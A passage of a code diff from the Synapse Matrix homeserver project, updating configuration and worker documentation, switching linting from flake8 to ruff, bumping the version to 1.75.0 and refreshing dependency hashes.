Useful options for Synapse admins.
@ -1148,7 +1257,7 @@ number of entries that can be stored.
* `max_cache_memory_usage` sets a ceiling on how much memory the cache can use before caches begin to be continuously evicted.
They will continue to be evicted until the memory usage drops below the `target_memory_usage`, set in
the setting below, or until the `min_cache_ttl` is hit. There is no default value for this option.
* `target_memory_usage` sets a rough target for the desired memory usage of the caches. There is no default value
* `target_cache_memory_usage` sets a rough target for the desired memory usage of the caches. There is no default value
for this option.
* `min_cache_ttl` sets a limit under which newer cache entries are not evicted and is only applied when
caches are actively being evicted/`max_cache_memory_usage` has been exceeded. This is to protect hot caches
@ -1212,7 +1321,7 @@ Associated sub-options:
connection pool. For a reference to valid arguments, see:
* for [sqlite](https://docs.python.org/3/library/sqlite3.html#sqlite3.connect)
* for [postgres](https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-PARAMKEYWORDS)
* for [the connection pool](https://twistedmatrix.com/documents/current/api/twisted.enterprise.adbapi.ConnectionPool.html#__init__)
* for [the connection pool](https://docs.twistedmatrix.com/en/stable/api/twisted.enterprise.adbapi.ConnectionPool.html#__init__)
For more information on using Synapse with Postgres,
see [here](../../postgres.md).
@ -2514,18 +2623,18 @@ state events are shared with users:
- `m.room.topic`
To change the default behavior, use the following sub-options:
* `disable_default_event_types`: boolean. Set to `true` to disable the above
* `disable_default_event_types`: boolean. Set to `true` to disable the above
defaults. If this is enabled, only the event types listed in
`additional_event_types` are shared. Defaults to `false`.
* `additional_event_types`: A list of additional state events to include in the
events to be shared. By default, this list is empty (so only the default event
* `additional_event_types`: A list of additional state events to include in the
events to be shared. By default, this list is empty (so only the default event
types are shared).
Each entry in this list should be either a single string or a list of two
strings.
strings.
* A standalone string `t` represents all events with type `t` (i.e.
with no restrictions on state keys).
* A pair of strings `[t, s]` represents a single event with type `t` and
* A pair of strings `[t, s]` represents a single event with type `t` and
state key `s`. The same type can appear in two entries with different state
keys: in this situation, both state keys are included in prejoin state.
@ -2944,8 +3053,13 @@ Options for each entry include:
values are `client_secret_basic` (default), `client_secret_post` and
`none`.
* `pkce_method`: Whether to use proof key for code exchange when requesting
and exchanging the token. Valid values are: `auto`, `always`, or `never`. Defaults
to `auto`, which uses PKCE if supported during metadata discovery. Set to `always`
to force enable PKCE or `never` to force disable PKCE.
* `scopes`: list of scopes to request. This should normally include the "openid"
scope. Defaults to ["openid"].
scope. Defaults to `["openid"]`.
* `authorization_endpoint`: the oauth2 authorization endpoint. Required if
provider discovery is disabled.
@ -2989,17 +3103,35 @@ Options for each entry include:
For the default provider, the following settings are available:
* `subject_template`: Jinja2 template for a unique identifier for the user.
Defaults to `{{ user.sub }}`, which OpenID Connect compliant providers should provide.
This replaces and overrides `subject_claim`.
* `subject_claim`: name of the claim containing a unique identifier
for the user. Defaults to 'sub', which OpenID Connect
compliant providers should provide.
*Deprecated in Synapse v1.75.0.*
* `picture_template`: Jinja2 template for an url for the user's profile picture.
Defaults to `{{ user.picture }}`, which OpenID Connect compliant providers should
provide and has to refer to a direct image file such as PNG, JPEG, or GIF image file.
This replaces and overrides `picture_claim`.
Currently only supported in monolithic (single-process) server configurations
where the media repository runs within the Synapse process.
* `picture_claim`: name of the claim containing an url for the user's profile picture.
Defaults to 'picture', which OpenID Connect compliant providers should provide
and has to refer to a direct image file such as PNG, JPEG, or GIF image file.
Currently only supported in monolithic (single-process) server configurations
where the media repository runs within the Synapse process.
*Deprecated in Synapse v1.75.0.*
* `localpart_template`: Jinja2 template for the localpart of the MXID.
If this is not set, the user will be prompted to choose their
own username (see the documentation for the `sso_auth_account_details.html`
@ -3259,114 +3391,6 @@ ui_auth:
session_timeout: "15s"
```
---
### `email`
Configuration for sending emails from Synapse.
Server admins can configure custom templates for email content. See
[here](../../templates.md) for more information.
This setting has the following sub-options:
* `smtp_host`: The hostname of the outgoing SMTP server to use. Defaults to 'localhost'.
* `smtp_port`: The port on the mail server for outgoing SMTP. Defaults to 465 if `force_tls` is true, else 25.
_Changed in Synapse 1.64.0:_ the default port is now aware of `force_tls`.
* `smtp_user` and `smtp_pass`: Username/password for authentication to the SMTP server. By default, no
authentication is attempted.
* `force_tls`: By default, Synapse connects over plain text and then optionally upgrades
to TLS via STARTTLS. If this option is set to true, TLS is used from the start (Implicit TLS),
and the option `require_transport_security` is ignored.
It is recommended to enable this if supported by your mail server.
_New in Synapse 1.64.0._
* `require_transport_security`: Set to true to require TLS transport security for SMTP.
By default, Synapse will connect over plain text, and will then switch to
TLS via STARTTLS *if the SMTP server supports it*. If this option is set,
Synapse will refuse to connect unless the server supports STARTTLS.
* `enable_tls`: By default, if the server supports TLS, it will be used, and the server
must present a certificate that is valid for 'smtp_host'. If this option
is set to false, TLS will not be used.
* `notif_from`: defines the "From" address to use when sending emails.
It must be set if email sending is enabled. The placeholder '%(app)s' will be replaced by the application name,
which is normally set in `app_name`, but may be overridden by the
Matrix client application. Note that the placeholder must be written '%(app)s', including the
trailing 's'.
* `app_name`: `app_name` defines the default value for '%(app)s' in `notif_from` and email
subjects. It defaults to 'Matrix'.
* `enable_notifs`: Set to true to enable sending emails for messages that the user
has missed. Disabled by default.
* `notif_for_new_users`: Set to false to disable automatic subscription to email
notifications for new users. Enabled by default.
* `client_base_url`: Custom URL for client links within the email notifications. By default
links will be based on "https://matrix.to". (This setting used to be called `riot_base_url`;
the old name is still supported for backwards-compatibility but is now deprecated.)
* `validation_token_lifetime`: Configures the time that a validation email will expire after sending.
Defaults to 1h.
* `invite_client_location`: The web client location to direct users to during an invite. This is passed
to the identity server as the `org.matrix.web_client_location` key. Defaults
to unset, giving no guidance to the identity server.
* `subjects`: Subjects to use when sending emails from Synapse. The placeholder '%(app)s' will
be replaced with the value of the `app_name` setting, or by a value dictated by the Matrix client application.
In addition, each subject can use the following placeholders: '%(person)s', which will be replaced by the displayname
of the user(s) that sent the message(s), e.g. "Alice and Bob", and '%(room)s', which will be replaced by the name of the room the
message(s) have been sent to, e.g. "My super room". In addition, emails related to account administration will
can use the '%(server_name)s' placeholder, which will be replaced by the value of the
`server_name` setting in your Synapse configuration.
Here is a list of subjects for notification emails that can be set:
* `message_from_person_in_room`: Subject to use to notify about one message from one or more user(s) in a
room which has a name. Defaults to "[%(app)s] You have a message on %(app)s from %(person)s in the %(room)s room..."
* `message_from_person`: Subject to use to notify about one message from one or more user(s) in a
room which doesn't have a name. Defaults to "[%(app)s] You have a message on %(app)s from %(person)s..."
* `messages_from_person`: Subject to use to notify about multiple messages from one or more users in
a room which doesn't have a name. Defaults to "[%(app)s] You have messages on %(app)s from %(person)s..."
* `messages_in_room`: Subject to use to notify about multiple messages in a room which has a
name. Defaults to "[%(app)s] You have messages on %(app)s in the %(room)s room..."
* `messages_in_room_and_others`: Subject to use to notify about multiple messages in multiple rooms.
Defaults to "[%(app)s] You have messages on %(app)s in the %(room)s room and others..."
* `messages_from_person_and_others`: Subject to use to notify about multiple messages from multiple persons in
multiple rooms. This is similar to the setting above except it's used when
the room in which the notification was triggered has no name. Defaults to
"[%(app)s] You have messages on %(app)s from %(person)s and others..."
* `invite_from_person_to_room`: Subject to use to notify about an invite to a room which has a name.
Defaults to "[%(app)s] %(person)s has invited you to join the %(room)s room on %(app)s..."
* `invite_from_person`: Subject to use to notify about an invite to a room which doesn't have a
name. Defaults to "[%(app)s] %(person)s has invited you to chat on %(app)s..."
* `password_reset`: Subject to use when sending a password reset email. Defaults to "[%(server_name)s] Password reset"
* `email_validation`: Subject to use when sending a verification email to assert an address's
ownership. Defaults to "[%(server_name)s] Validate your email"
Example configuration:
```yaml
email:
smtp_host: mail.server
smtp_port: 587
smtp_user: "exampleusername"
smtp_pass: "examplepassword"
force_tls: true
require_transport_security: true
enable_tls: false
notif_from: "Your Friendly %(app)s homeserver <noreply@example.com>"
app_name: my_branded_matrix_server
enable_notifs: true
notif_for_new_users: false
client_base_url: "http://localhost/riot"
validation_token_lifetime: 15m
invite_client_location: https://app.element.io
subjects:
message_from_person_in_room: "[%(app)s] You have a message on %(app)s from %(person)s in the %(room)s room..."
message_from_person: "[%(app)s] You have a message on %(app)s from %(person)s..."
messages_from_person: "[%(app)s] You have messages on %(app)s from %(person)s..."
messages_in_room: "[%(app)s] You have messages on %(app)s in the %(room)s room..."
messages_in_room_and_others: "[%(app)s] You have messages on %(app)s in the %(room)s room and others..."
messages_from_person_and_others: "[%(app)s] You have messages on %(app)s from %(person)s and others..."
invite_from_person_to_room: "[%(app)s] %(person)s has invited you to join the %(room)s room on %(app)s..."
invite_from_person: "[%(app)s] %(person)s has invited you to chat on %(app)s..."
password_reset: "[%(server_name)s] Password reset"
email_validation: "[%(server_name)s] Validate your email"
```
---
## Push
Configuration settings related to push notifications
@ -3840,6 +3864,48 @@ Example configuration:
```yaml
run_background_tasks_on: worker1
```
---
### `update_user_directory_from_worker`
The [worker](../../workers.md#updating-the-user-directory) that is used to
update the user directory. If not provided this defaults to the main process.
Example configuration:
```yaml
update_user_directory_from_worker: worker1
```
_Added in Synapse 1.59.0._
---
### `notify_appservices_from_worker`
The [worker](../../workers.md#notifying-application-services) that is used to
send output traffic to Application Services. If not provided this defaults
to the main process.
Example configuration:
```yaml
notify_appservices_from_worker: worker1
```
_Added in Synapse 1.59.0._
---
### `media_instance_running_background_jobs`
The [worker](../../workers.md#synapseappmedia_repository) that is used to run
background tasks for media repository. If running multiple media repositories
you must configure a single instance to run the background tasks. If not provided
this defaults to the main process or your single `media_repository` worker.
Example configuration:
```yaml
media_instance_running_background_jobs: worker1
```
_Added in Synapse 1.16.0._
---
### `redis`
@ -3957,7 +4023,7 @@ worker_listeners:
### `worker_daemonize`
Specifies whether the worker should be started as a daemon process.
If Synapse is being managed by [systemd](../../systemd-with-workers/README.md), this option
If Synapse is being managed by [systemd](../../systemd-with-workers/), this option
must be omitted or set to `false`.
Defaults to `false`.

View File

@ -157,7 +157,7 @@ Finally, you need to start your worker processes. This can be done with either
`synctl` or your distribution's preferred service manager such as `systemd`. We
recommend the use of `systemd` where available: for information on setting up
`systemd` to start synapse workers, see
[Systemd with Workers](systemd-with-workers). To use `synctl`, see
[Systemd with Workers](systemd-with-workers/). To use `synctl`, see
[Using synctl with Workers](synctl_workers.md).
@ -386,7 +386,7 @@ so. It will then pass those events over HTTP replication to any configured event
persisters (or the main process if none are configured).
Note that `event_creator`s and `event_persister`s are implemented using the same
[`synapse.app.generic_worker`](#synapse.app.generic_worker).
[`synapse.app.generic_worker`](#synapseappgeneric_worker).
An example [`stream_writers`](usage/configuration/config_documentation.md#stream_writers)
configuration with multiple writers:
@ -465,7 +465,8 @@ An example for a dedicated background worker instance:
You can designate one generic worker to update the user directory.
Specify its name in the shared configuration as follows:
Specify its name in the [shared configuration](usage/configuration/config_documentation.md#update_user_directory_from_worker)
as follows:
```yaml
update_user_directory_from_worker: worker_name
@ -490,7 +491,8 @@ worker application type.
You can designate one generic worker to send output traffic to Application Services.
Doesn't handle any REST endpoints itself, but you should specify its name in the
shared configuration as follows:
[shared configuration](usage/configuration/config_documentation.md#notify_appservices_from_worker)
as follows:
```yaml
notify_appservices_from_worker: worker_name
@ -502,11 +504,38 @@ after setting this option in the shared configuration!
This style of configuration supersedes the legacy `synapse.app.appservice`
worker application type.
#### Push Notifications
You can designate generic worker to sending push notifications to
a [push gateway](https://spec.matrix.org/v1.5/push-gateway-api/) such as
[sygnal](https://github.com/matrix-org/sygnal) and email.
This will stop the main process sending push notifications.
The workers responsible for sending push notifications can be defined using the
[`pusher_instances`](usage/configuration/config_documentation.md#pusher_instances)
option. For example:
```yaml
pusher_instances:
- pusher_worker1
- pusher_worker2
```
Multiple workers can be added to this map, in which case the work is balanced
across them. Ensure the main process and all pusher workers are restarted after changing
this option.
These workers don't need to accept incoming HTTP requests to send push notifications,
so no additional reverse proxy configuration is required for pusher workers.
This style of configuration supersedes the legacy `synapse.app.pusher`
worker application type.
### `synapse.app.pusher`
It is likely this option will be deprecated in the future and is not recommended for new
installations. Instead, [use `synapse.app.generic_worker` with the `pusher_instances`](usage/configuration/config_documentation.md#pusher_instances).
installations. Instead, [use `synapse.app.generic_worker` with the `pusher_instances`](#push-notifications).
Handles sending push notifications to sygnal and email. Doesn't handle any
REST endpoints itself, but you should set
@ -547,7 +576,7 @@ Note this worker cannot be load-balanced: only one instance should be active.
### `synapse.app.federation_sender`
It is likely this option will be deprecated in the future and not recommended for
new installations. Instead, [use `synapse.app.generic_worker` with the `federation_sender_instances`](usage/configuration/config_documentation.md#federation_sender_instances).
new installations. Instead, [use `synapse.app.generic_worker` with the `federation_sender_instances`](usage/configuration/config_documentation.md#federation_sender_instances).
Handles sending federation traffic to other servers. Doesn't handle any
REST endpoints itself, but you should set
@ -606,7 +635,9 @@ expose the `media` resource. For example:
```
Note that if running multiple media repositories they must be on the same server
and you must configure a single instance to run the background tasks, e.g.:
and you must specify a single instance to run the background tasks in the
[shared configuration](usage/configuration/config_documentation.md#media_instance_running_background_jobs),
e.g.:
```yaml
media_instance_running_background_jobs: "media-repository-1"

View File

@ -36,9 +36,6 @@ exclude = (?x)
|tests/api/test_ratelimiting.py
|tests/app/test_openid_listener.py
|tests/appservice/test_scheduler.py
|tests/config/test_cache.py
|tests/config/test_tls.py
|tests/crypto/test_keyring.py
|tests/events/test_presence_router.py
|tests/events/test_utils.py
|tests/federation/test_federation_catch_up.py
@ -89,19 +86,19 @@ disallow_untyped_defs = False
[mypy-tests.*]
disallow_untyped_defs = False
[mypy-tests.config.test_api]
[mypy-tests.config.*]
disallow_untyped_defs = True
[mypy-tests.crypto.*]
disallow_untyped_defs = True
[mypy-tests.federation.transport.test_client]
disallow_untyped_defs = True
[mypy-tests.handlers.test_sso]
[mypy-tests.handlers.*]
disallow_untyped_defs = True
[mypy-tests.handlers.test_user_directory]
disallow_untyped_defs = True
[mypy-tests.metrics.test_background_process_metrics]
[mypy-tests.metrics.*]
disallow_untyped_defs = True
[mypy-tests.push.test_bulk_push_rule_evaluator]

746
poetry.lock generated

File diff suppressed because it is too large Load Diff

View File

@ -40,6 +40,46 @@ target-version = ['py37', 'py38', 'py39', 'py310']
# https://black.readthedocs.io/en/stable/usage_and_configuration/file_collection_and_discovery.html#gitignore
# Use `extend-exclude` if you want to exclude something in addition to this.
[tool.ruff]
line-length = 88
# See https://github.com/charliermarsh/ruff/#pycodestyle
# for error codes. The ones we ignore are:
# E731: do not assign a lambda expression, use a def
# E501: Line too long (black enforces this for us)
#
# See https://github.com/charliermarsh/ruff/#pyflakes
# F401: unused import
# F811: Redefinition of unused
# F821: Undefined name
#
# flake8-bugbear compatible checks. Its error codes are described at
# https://github.com/charliermarsh/ruff/#flake8-bugbear
# B019: Use of functools.lru_cache or functools.cache on methods can lead to memory leaks
# B023: Functions defined inside a loop must not use variables redefined in the loop
# B024: Abstract base class with no abstract method.
ignore = [
"B019",
"B023",
"B024",
"E501",
"E731",
"F401",
"F811",
"F821",
]
select = [
# pycodestyle checks.
"E",
"W",
# pyflakes checks.
"F",
# flake8-bugbear checks.
"B0",
# flake8-comprehensions checks.
"C4",
]
[tool.isort]
line_length = 88
sections = ["FUTURE", "STDLIB", "THIRDPARTY", "TWISTED", "FIRSTPARTY", "TESTS", "LOCALFOLDER"]
@ -57,7 +97,7 @@ manifest-path = "rust/Cargo.toml"
[tool.poetry]
name = "matrix-synapse"
version = "1.74.0"
version = "1.75.0"
description = "Homeserver for the Matrix decentralised comms protocol"
authors = ["Matrix.org Team and Contributors <packages@matrix.org>"]
license = "Apache-2.0"
@ -136,7 +176,7 @@ Twisted = {extras = ["tls"], version = ">=18.9.0"}
treq = ">=15.1"
# Twisted has required pyopenssl 16.0 since about Twisted 16.6.
pyOpenSSL = ">=16.0.0"
PyYAML = ">=3.11"
PyYAML = ">=3.13"
pyasn1 = ">=0.1.9"
pyasn1-modules = ">=0.0.7"
bcrypt = ">=3.1.7"
@ -274,12 +314,10 @@ all = [
]
[tool.poetry.dev-dependencies]
## We pin black so that our tests don't start failing on new releases.
# We pin black so that our tests don't start failing on new releases.
isort = ">=5.10.1"
black = ">=22.3.0"
flake8-comprehensions = "*"
flake8-bugbear = ">=21.3.2"
flake8 = "*"
ruff = "0.0.215"
# Typechecking
mypy = "*"

View File

@ -1,6 +1,6 @@
attrs==22.1.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:29adc2665447e5191d0e7c568fde78b21f9672d344281d0c6e1ab085429b22b6 \
--hash=sha256:86efa402f67bf2df34f51a335487cf46b1ec130d02b8d39fd248abfd30da551c
attrs==22.2.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:29e95c7f6778868dbd49170f98f8818f78f3dc5e0e37c0b1f474e3561b240836 \
--hash=sha256:c9227bfc2f01993c03f68db37d1d15c9690188323c067c641f1a35ca58185f99
authlib==1.2.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:4ddf4fd6cfa75c9a460b361d4bd9dac71ffda0be879dbe4292a02e92349ad55a \
--hash=sha256:4fa3e80883a5915ef9f5bc28630564bc4ed5b5af39812a3ff130ec76bd631e9d
@ -38,57 +38,71 @@ canonicaljson==1.6.4 ; python_full_version >= "3.7.1" and python_full_version <
certifi==2022.12.7 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:35824b4c3a97115964b408844d64aa14db1cc518f6562e8d7261699d1350a9e3 \
--hash=sha256:4ad3232f5e926d6718ec31cfc1fcadfde020920e278684144551c91769c7bc18
cffi==1.15.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:00c878c90cb53ccfaae6b8bc18ad05d2036553e6d9d1d9dbcf323bbe83854ca3 \
--hash=sha256:0104fb5ae2391d46a4cb082abdd5c69ea4eab79d8d44eaaf79f1b1fd806ee4c2 \
--hash=sha256:06c48159c1abed75c2e721b1715c379fa3200c7784271b3c46df01383b593636 \
--hash=sha256:0808014eb713677ec1292301ea4c81ad277b6cdf2fdd90fd540af98c0b101d20 \
--hash=sha256:10dffb601ccfb65262a27233ac273d552ddc4d8ae1bf93b21c94b8511bffe728 \
--hash=sha256:14cd121ea63ecdae71efa69c15c5543a4b5fbcd0bbe2aad864baca0063cecf27 \
--hash=sha256:17771976e82e9f94976180f76468546834d22a7cc404b17c22df2a2c81db0c66 \
--hash=sha256:181dee03b1170ff1969489acf1c26533710231c58f95534e3edac87fff06c443 \
--hash=sha256:23cfe892bd5dd8941608f93348c0737e369e51c100d03718f108bf1add7bd6d0 \
--hash=sha256:263cc3d821c4ab2213cbe8cd8b355a7f72a8324577dc865ef98487c1aeee2bc7 \
--hash=sha256:2756c88cbb94231c7a147402476be2c4df2f6078099a6f4a480d239a8817ae39 \
--hash=sha256:27c219baf94952ae9d50ec19651a687b826792055353d07648a5695413e0c605 \
--hash=sha256:2a23af14f408d53d5e6cd4e3d9a24ff9e05906ad574822a10563efcef137979a \
--hash=sha256:31fb708d9d7c3f49a60f04cf5b119aeefe5644daba1cd2a0fe389b674fd1de37 \
--hash=sha256:3415c89f9204ee60cd09b235810be700e993e343a408693e80ce7f6a40108029 \
--hash=sha256:3773c4d81e6e818df2efbc7dd77325ca0dcb688116050fb2b3011218eda36139 \
--hash=sha256:3b96a311ac60a3f6be21d2572e46ce67f09abcf4d09344c49274eb9e0bf345fc \
--hash=sha256:3f7d084648d77af029acb79a0ff49a0ad7e9d09057a9bf46596dac9514dc07df \
--hash=sha256:41d45de54cd277a7878919867c0f08b0cf817605e4eb94093e7516505d3c8d14 \
--hash=sha256:4238e6dab5d6a8ba812de994bbb0a79bddbdf80994e4ce802b6f6f3142fcc880 \
--hash=sha256:45db3a33139e9c8f7c09234b5784a5e33d31fd6907800b316decad50af323ff2 \
--hash=sha256:45e8636704eacc432a206ac7345a5d3d2c62d95a507ec70d62f23cd91770482a \
--hash=sha256:4958391dbd6249d7ad855b9ca88fae690783a6be9e86df65865058ed81fc860e \
--hash=sha256:4a306fa632e8f0928956a41fa8e1d6243c71e7eb59ffbd165fc0b41e316b2474 \
--hash=sha256:57e9ac9ccc3101fac9d6014fba037473e4358ef4e89f8e181f8951a2c0162024 \
--hash=sha256:59888172256cac5629e60e72e86598027aca6bf01fa2465bdb676d37636573e8 \
--hash=sha256:5e069f72d497312b24fcc02073d70cb989045d1c91cbd53979366077959933e0 \
--hash=sha256:64d4ec9f448dfe041705426000cc13e34e6e5bb13736e9fd62e34a0b0c41566e \
--hash=sha256:6dc2737a3674b3e344847c8686cf29e500584ccad76204efea14f451d4cc669a \
--hash=sha256:74fdfdbfdc48d3f47148976f49fab3251e550a8720bebc99bf1483f5bfb5db3e \
--hash=sha256:75e4024375654472cc27e91cbe9eaa08567f7fbdf822638be2814ce059f58032 \
--hash=sha256:786902fb9ba7433aae840e0ed609f45c7bcd4e225ebb9c753aa39725bb3e6ad6 \
--hash=sha256:8b6c2ea03845c9f501ed1313e78de148cd3f6cad741a75d43a29b43da27f2e1e \
--hash=sha256:91d77d2a782be4274da750752bb1650a97bfd8f291022b379bb8e01c66b4e96b \
--hash=sha256:91ec59c33514b7c7559a6acda53bbfe1b283949c34fe7440bcf917f96ac0723e \
--hash=sha256:920f0d66a896c2d99f0adbb391f990a84091179542c205fa53ce5787aff87954 \
--hash=sha256:a5263e363c27b653a90078143adb3d076c1a748ec9ecc78ea2fb916f9b861962 \
--hash=sha256:abb9a20a72ac4e0fdb50dae135ba5e77880518e742077ced47eb1499e29a443c \
--hash=sha256:c2051981a968d7de9dd2d7b87bcb9c939c74a34626a6e2f8181455dd49ed69e4 \
--hash=sha256:c21c9e3896c23007803a875460fb786118f0cdd4434359577ea25eb556e34c55 \
--hash=sha256:c2502a1a03b6312837279c8c1bd3ebedf6c12c4228ddbad40912d671ccc8a962 \
--hash=sha256:d4d692a89c5cf08a8557fdeb329b82e7bf609aadfaed6c0d79f5a449a3c7c023 \
--hash=sha256:da5db4e883f1ce37f55c667e5c0de439df76ac4cb55964655906306918e7363c \
--hash=sha256:e7022a66d9b55e93e1a845d8c9eba2a1bebd4966cd8bfc25d9cd07d515b33fa6 \
--hash=sha256:ef1f279350da2c586a69d32fc8733092fd32cc8ac95139a00377841f59a3f8d8 \
--hash=sha256:f54a64f8b0c8ff0b64d18aa76675262e1700f3995182267998c31ae974fbc382 \
--hash=sha256:f5c7150ad32ba43a07c4479f40241756145a1f03b43480e058cfd862bf5041c7 \
--hash=sha256:f6f824dc3bce0edab5f427efcfb1d63ee75b6fcb7282900ccaf925be84efb0fc \
--hash=sha256:fd8a250edc26254fe5b33be00402e6d287f562b6a5b2152dec302fa15bb3e997 \
--hash=sha256:ffaa5c925128e29efbde7301d8ecaf35c8c60ffbcd6a1ffd3a552177c8e5e796
cffi==1.15.1 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:00a9ed42e88df81ffae7a8ab6d9356b371399b91dbdf0c3cb1e84c03a13aceb5 \
--hash=sha256:03425bdae262c76aad70202debd780501fabeaca237cdfddc008987c0e0f59ef \
--hash=sha256:04ed324bda3cda42b9b695d51bb7d54b680b9719cfab04227cdd1e04e5de3104 \
--hash=sha256:0e2642fe3142e4cc4af0799748233ad6da94c62a8bec3a6648bf8ee68b1c7426 \
--hash=sha256:173379135477dc8cac4bc58f45db08ab45d228b3363adb7af79436135d028405 \
--hash=sha256:198caafb44239b60e252492445da556afafc7d1e3ab7a1fb3f0584ef6d742375 \
--hash=sha256:1e74c6b51a9ed6589199c787bf5f9875612ca4a8a0785fb2d4a84429badaf22a \
--hash=sha256:2012c72d854c2d03e45d06ae57f40d78e5770d252f195b93f581acf3ba44496e \
--hash=sha256:21157295583fe8943475029ed5abdcf71eb3911894724e360acff1d61c1d54bc \
--hash=sha256:2470043b93ff09bf8fb1d46d1cb756ce6132c54826661a32d4e4d132e1977adf \
--hash=sha256:285d29981935eb726a4399badae8f0ffdff4f5050eaa6d0cfc3f64b857b77185 \
--hash=sha256:30d78fbc8ebf9c92c9b7823ee18eb92f2e6ef79b45ac84db507f52fbe3ec4497 \
--hash=sha256:320dab6e7cb2eacdf0e658569d2575c4dad258c0fcc794f46215e1e39f90f2c3 \
--hash=sha256:33ab79603146aace82c2427da5ca6e58f2b3f2fb5da893ceac0c42218a40be35 \
--hash=sha256:3548db281cd7d2561c9ad9984681c95f7b0e38881201e157833a2342c30d5e8c \
--hash=sha256:3799aecf2e17cf585d977b780ce79ff0dc9b78d799fc694221ce814c2c19db83 \
--hash=sha256:39d39875251ca8f612b6f33e6b1195af86d1b3e60086068be9cc053aa4376e21 \
--hash=sha256:3b926aa83d1edb5aa5b427b4053dc420ec295a08e40911296b9eb1b6170f6cca \
--hash=sha256:3bcde07039e586f91b45c88f8583ea7cf7a0770df3a1649627bf598332cb6984 \
--hash=sha256:3d08afd128ddaa624a48cf2b859afef385b720bb4b43df214f85616922e6a5ac \
--hash=sha256:3eb6971dcff08619f8d91607cfc726518b6fa2a9eba42856be181c6d0d9515fd \
--hash=sha256:40f4774f5a9d4f5e344f31a32b5096977b5d48560c5592e2f3d2c4374bd543ee \
--hash=sha256:4289fc34b2f5316fbb762d75362931e351941fa95fa18789191b33fc4cf9504a \
--hash=sha256:470c103ae716238bbe698d67ad020e1db9d9dba34fa5a899b5e21577e6d52ed2 \
--hash=sha256:4f2c9f67e9821cad2e5f480bc8d83b8742896f1242dba247911072d4fa94c192 \
--hash=sha256:50a74364d85fd319352182ef59c5c790484a336f6db772c1a9231f1c3ed0cbd7 \
--hash=sha256:54a2db7b78338edd780e7ef7f9f6c442500fb0d41a5a4ea24fff1c929d5af585 \
--hash=sha256:5635bd9cb9731e6d4a1132a498dd34f764034a8ce60cef4f5319c0541159392f \
--hash=sha256:59c0b02d0a6c384d453fece7566d1c7e6b7bae4fc5874ef2ef46d56776d61c9e \
--hash=sha256:5d598b938678ebf3c67377cdd45e09d431369c3b1a5b331058c338e201f12b27 \
--hash=sha256:5df2768244d19ab7f60546d0c7c63ce1581f7af8b5de3eb3004b9b6fc8a9f84b \
--hash=sha256:5ef34d190326c3b1f822a5b7a45f6c4535e2f47ed06fec77d3d799c450b2651e \
--hash=sha256:6975a3fac6bc83c4a65c9f9fcab9e47019a11d3d2cf7f3c0d03431bf145a941e \
--hash=sha256:6c9a799e985904922a4d207a94eae35c78ebae90e128f0c4e521ce339396be9d \
--hash=sha256:70df4e3b545a17496c9b3f41f5115e69a4f2e77e94e1d2a8e1070bc0c38c8a3c \
--hash=sha256:7473e861101c9e72452f9bf8acb984947aa1661a7704553a9f6e4baa5ba64415 \
--hash=sha256:8102eaf27e1e448db915d08afa8b41d6c7ca7a04b7d73af6514df10a3e74bd82 \
--hash=sha256:87c450779d0914f2861b8526e035c5e6da0a3199d8f1add1a665e1cbc6fc6d02 \
--hash=sha256:8b7ee99e510d7b66cdb6c593f21c043c248537a32e0bedf02e01e9553a172314 \
--hash=sha256:91fc98adde3d7881af9b59ed0294046f3806221863722ba7d8d120c575314325 \
--hash=sha256:94411f22c3985acaec6f83c6df553f2dbe17b698cc7f8ae751ff2237d96b9e3c \
--hash=sha256:98d85c6a2bef81588d9227dde12db8a7f47f639f4a17c9ae08e773aa9c697bf3 \
--hash=sha256:9ad5db27f9cabae298d151c85cf2bad1d359a1b9c686a275df03385758e2f914 \
--hash=sha256:a0b71b1b8fbf2b96e41c4d990244165e2c9be83d54962a9a1d118fd8657d2045 \
--hash=sha256:a0f100c8912c114ff53e1202d0078b425bee3649ae34d7b070e9697f93c5d52d \
--hash=sha256:a591fe9e525846e4d154205572a029f653ada1a78b93697f3b5a8f1f2bc055b9 \
--hash=sha256:a5c84c68147988265e60416b57fc83425a78058853509c1b0629c180094904a5 \
--hash=sha256:a66d3508133af6e8548451b25058d5812812ec3798c886bf38ed24a98216fab2 \
--hash=sha256:a8c4917bd7ad33e8eb21e9a5bbba979b49d9a97acb3a803092cbc1133e20343c \
--hash=sha256:b3bbeb01c2b273cca1e1e0c5df57f12dce9a4dd331b4fa1635b8bec26350bde3 \
--hash=sha256:cba9d6b9a7d64d4bd46167096fc9d2f835e25d7e4c121fb2ddfc6528fb0413b2 \
--hash=sha256:cc4d65aeeaa04136a12677d3dd0b1c0c94dc43abac5860ab33cceb42b801c1e8 \
--hash=sha256:ce4bcc037df4fc5e3d184794f27bdaab018943698f4ca31630bc7f84a7b69c6d \
--hash=sha256:cec7d9412a9102bdc577382c3929b337320c4c4c4849f2c5cdd14d7368c5562d \
--hash=sha256:d400bfb9a37b1351253cb402671cea7e89bdecc294e8016a707f6d1d8ac934f9 \
--hash=sha256:d61f4695e6c866a23a21acab0509af1cdfd2c013cf256bbf5b6b5e2695827162 \
--hash=sha256:db0fbb9c62743ce59a9ff687eb5f4afbe77e5e8403d6697f7446e5f609976f76 \
--hash=sha256:dd86c085fae2efd48ac91dd7ccffcfc0571387fe1193d33b6394db7ef31fe2a4 \
--hash=sha256:e00b098126fd45523dd056d2efba6c5a63b71ffe9f2bbe1a4fe1716e1d0c331e \
--hash=sha256:e229a521186c75c8ad9490854fd8bbdd9a0c9aa3a524326b55be83b54d4e0ad9 \
--hash=sha256:e263d77ee3dd201c3a142934a086a4450861778baaeeb45db4591ef65550b0a6 \
--hash=sha256:ed9cb427ba5504c1dc15ede7d516b84757c3e3d7868ccc85121d9310d27eed0b \
--hash=sha256:fa6693661a4c91757f4412306191b6dc88c1703f780c8234035eac011922bc01 \
--hash=sha256:fcd131dd944808b5bdb38e6f5b53013c5aa4f334c5cad0c72742f6eba4b73db0
charset-normalizer==2.0.12 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:2857e29ff0d34db842cd7ca3230549d1a697f96ee6d3fb071cfa6c7393832597 \
